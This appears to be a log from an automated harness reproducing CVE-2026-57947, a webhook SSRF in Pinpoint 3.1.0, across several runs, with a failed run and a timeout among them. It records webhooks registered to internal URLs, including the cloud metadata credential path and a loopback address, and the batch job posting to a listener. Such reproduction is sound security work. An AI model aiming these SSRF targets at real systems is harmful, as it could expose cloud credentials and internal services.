=== Pinpoint CVE-2026-57947 webhook SSRF reproduction === ROOT=/data/pruva/runs/37f6347b-a435-4fc6-8a66-89724db7070e/bundle PROJECT_CACHE_DIR=/data/pruva/project-cache/59d9650b-ccde-4594-a94f-d429a95f09ba Cleaning up previous Pinpoint stack... ppssrf-web Starting Pinpoint backend services (HBase, MySQL, Redis, ZooKeeper)... Volume ppssrf_mysql_data Creating Volume ppssrf_mysql_data Created Volume ppssrf_hbase_data Creating Volume ppssrf_hbase_data Created Container ppssrf-zoo2-1 Creating Container ppssrf-zoo3-1 Creating Container ppssrf-redis-1 Creating Container ppssrf-zoo1-1 Creating Container pinpoint-mysql Creating Container pinpoint-mysql Created Container ppssrf-zoo3-1 Created Container ppssrf-redis-1 Created Container ppssrf-zoo2-1 Created Container ppssrf-zoo1-1 Created Container pinpoint-hbase Creating Container pinpoint-hbase Created Container ppssrf-redis-1 Starting Container ppssrf-zoo3-1 Starting Container ppssrf-zoo2-1 Starting Container pinpoint-mysql Starting Container ppssrf-zoo1-1 Starting Container pinpoint-mysql Started Container ppssrf-zoo3-1 Started Container ppssrf-zoo1-1 Started Container pinpoint-hbase Starting Container ppssrf-zoo2-1 Started Container ppssrf-redis-1 Started Container pinpoint-hbase Started Waiting for MySQL to be ready... MySQL ready. Waiting for HBase master to be active... === Pinpoint CVE-2026-57947 webhook SSRF reproduction === ROOT=/data/pruva/runs/37f6347b-a435-4fc6-8a66-89724db7070e/bundle PROJECT_CACHE_DIR=/data/pruva/project-cache/59d9650b-ccde-4594-a94f-d429a95f09ba REUSE_STACK is set and backend containers are present; skipping full bootstrap. Starting Pinpoint Web (vulnerable 3.1.0, basic login enabled)... 2f0a36e3865cf4b07bd0efb61ab8b4d16967ad5e0cc55f81867f138736154dfe Waiting for Pinpoint Web to start... Pinpoint Web is up (api/webhook returned 401 for unauthenticated request). Pinpoint Web reachable at http://172.20.0.1:28080 Checking unauthenticated access is rejected... unauth_http_code=401 Logging in as testuser... login_http_code=302 Registering webhooks pointing to internal URLs... register_metadata_http_code=200 register_loopback_http_code=200 Registration result: {"result":"SUCCESS","webhookId":"1"} Registration result: {"result":"SUCCESS","webhookId":"2"} Retrieving stored webhooks... [{"webhookId":"1","alias":null,"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/","applicationName":"test-app","serviceName":null,"applicationId":"test-app"},{"webhookId":"2","alias":null,"url":"http://127.0.0.1:9999/ssrf-poc","applicationName":"test-app","serviceName":null,"applicationId":"test-app"}]=== Reproduction successful === Stored webhooks include internal URLs. The /api/webhook endpoint accepts SSRF targets. Traceback (most recent call last): File "", line 1, in import json,sys; d=json.load(open(sys.argv[1])); print(d.get('proof_carry',{}).get('enabled',False)) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ AttributeError: 'NoneType' object has no attribute 'get' === Pinpoint CVE-2026-57947 webhook SSRF reproduction === ROOT=/data/pruva/runs/37f6347b-a435-4fc6-8a66-89724db7070e/bundle PROJECT_CACHE_DIR=/data/pruva/project-cache/59d9650b-ccde-4594-a94f-d429a95f09ba Removing previous web/batch/listener containers for reuse... ppssrf-web ppssrf-batch ssrf-listener Reusing existing backend stack (HBase, MySQL, ZooKeeper, Redis)... Registering fake application 'test-app-1783248005' in HBase ApplicationIndex... import java.nio.ByteBuffer [Java::JavaNio::ByteBuffer] put 'ApplicationIndex', 'test-app-1783248005', 'Agents:agent-1783248005', ByteBuffer.allocate(2).putShort(1010).array() Took 0.2177 seconds exit Starting SSRF listener container... a54532186448ef8ec7f7a08e5ec1402b28e7673b3c3f999f703bde2bd3735476 Starting Pinpoint Web (vulnerable 3.1.0, basic login enabled)... 88ecdc1e9befbeec01bcb87a524db812ed75f372ca0e97052c295219bf0edb12 Waiting for Pinpoint Web to start... Pinpoint Web is up (api/webhook returned 401 for unauthenticated request). Pinpoint Web reachable at http://172.20.0.1:28080 Checking unauthenticated access is rejected... Logging in as testuser... Registering SSRF target webhooks as authenticated ROLE_USER... Registration result: {"result":"SUCCESS","webhookId":"4"} Registration result: {"result":"SUCCESS","webhookId":"5"} Registration result: {"result":"SUCCESS","webhookId":"6"} Retrieving stored webhooks... Logging in as adminuser to create alarm rule... Creating user group test-group-1783248005... Creating alarm rule linked to listener webhook 6... Starting Pinpoint Batch to execute alarmJob and deliver the webhook... 291edf354d41110a2405f6e92e9a70841ee9874fe5711de93aaee073df65dd86 Waiting for alarm batch job to complete... Batch job did not finish in time === Pinpoint CVE-2026-57947 webhook SSRF reproduction === ROOT=/data/pruva/runs/37f6347b-a435-4fc6-8a66-89724db7070e/bundle PROJECT_CACHE_DIR=/data/pruva/project-cache/59d9650b-ccde-4594-a94f-d429a95f09ba Removing previous web/batch/listener containers for reuse... ppssrf-web ppssrf-batch ssrf-listener Reusing existing backend stack (HBase, MySQL, ZooKeeper, Redis)... Registering fake application 'test-app-1783248463' in HBase ApplicationIndex... import java.nio.ByteBuffer [Java::JavaNio::ByteBuffer] put 'ApplicationIndex', 'test-app-1783248463', 'Agents:agent-1783248463', ByteBuffer.allocate(2).putShort(1010).array() Took 0.2130 seconds exit Starting SSRF listener container... 2a8b1b9213f6719dc38a5d2863cc52d066937ed1122a80a9f1ad82be1557ec6c Starting Pinpoint Web (vulnerable 3.1.0, basic login enabled)... abb8b25cb447c55cfa661825508250c01404a913dcad48a6f44fe500348d67b5 Waiting for Pinpoint Web to start... Pinpoint Web is up (api/webhook returned 401 for unauthenticated request). Pinpoint Web reachable at http://172.20.0.1:28080 Checking unauthenticated access is rejected... Logging in as testuser... Registering SSRF target webhooks as authenticated ROLE_USER... Registration result: {"result":"SUCCESS","webhookId":"7"} Registration result: {"result":"SUCCESS","webhookId":"8"} Registration result: {"result":"SUCCESS","webhookId":"9"} Retrieving stored webhooks... Logging in as adminuser to create alarm rule... Creating user group test-group-1783248463... Creating alarm rule linked to listener webhook 9... Starting Pinpoint Batch to execute alarmJob and deliver the webhook... f1b8f7c8f6e1fa013b63b3a989b6d592c669164ea5e502cab043e93b4aac6d63 Waiting for the Pinpoint batch to send a POST to the controlled listener... Listener received POST from Pinpoint batch after 6 seconds. ppssrf-batch === Reproduction successful === Pinpoint 3.1.0 accepted internal URLs via /api/webhook, stored them, and the alarm batch job sent a POST to the controlled internal listener. === Pinpoint CVE-2026-57947 webhook SSRF reproduction === ROOT=/data/pruva/runs/37f6347b-a435-4fc6-8a66-89724db7070e/bundle PROJECT_CACHE_DIR=/data/pruva/project-cache/59d9650b-ccde-4594-a94f-d429a95f09ba Removing previous web/batch/listener containers for reuse... ppssrf-web ppssrf-batch ssrf-listener Reusing existing backend stack (HBase, MySQL, ZooKeeper, Redis)... Registering fake application 'test-app-1783248501' in HBase ApplicationIndex... import java.nio.ByteBuffer [Java::JavaNio::ByteBuffer] put 'ApplicationIndex', 'test-app-1783248501', 'Agents:agent-1783248501', ByteBuffer.allocate(2).putShort(1010).array() Took 0.2253 seconds exit Starting SSRF listener container... 6ca3475493826a2d5cd8e52c56a34a7767af5fa9a403d7acdd1d324e09b8b8bb Starting Pinpoint Web (vulnerable 3.1.0, basic login enabled)... 505df132177fbc766d20c254ac88e09dc06655e7a629d5a607605a339e19c617 Waiting for Pinpoint Web to start... Pinpoint Web is up (api/webhook returned 401 for unauthenticated request). Pinpoint Web reachable at http://172.20.0.1:28080 Checking unauthenticated access is rejected... Logging in as testuser... Registering SSRF target webhooks as authenticated ROLE_USER... Registration result: {"result":"SUCCESS","webhookId":"10"} Registration result: {"result":"SUCCESS","webhookId":"11"} Registration result: {"result":"SUCCESS","webhookId":"12"} Retrieving stored webhooks... Logging in as adminuser to create alarm rule... Creating user group test-group-1783248501... Creating alarm rule linked to listener webhook 12... Starting Pinpoint Batch to execute alarmJob and deliver the webhook... 3d13f47767c476a5025575a9bc85b243452040ca32d0d77dcd3b6b8c00135dce Waiting for the Pinpoint batch to send a POST to the controlled listener... Listener received POST from Pinpoint batch after 6 seconds. ppssrf-batch === Reproduction successful === Pinpoint 3.1.0 accepted internal URLs via /api/webhook, stored them, and the alarm batch job sent a POST to the controlled internal listener.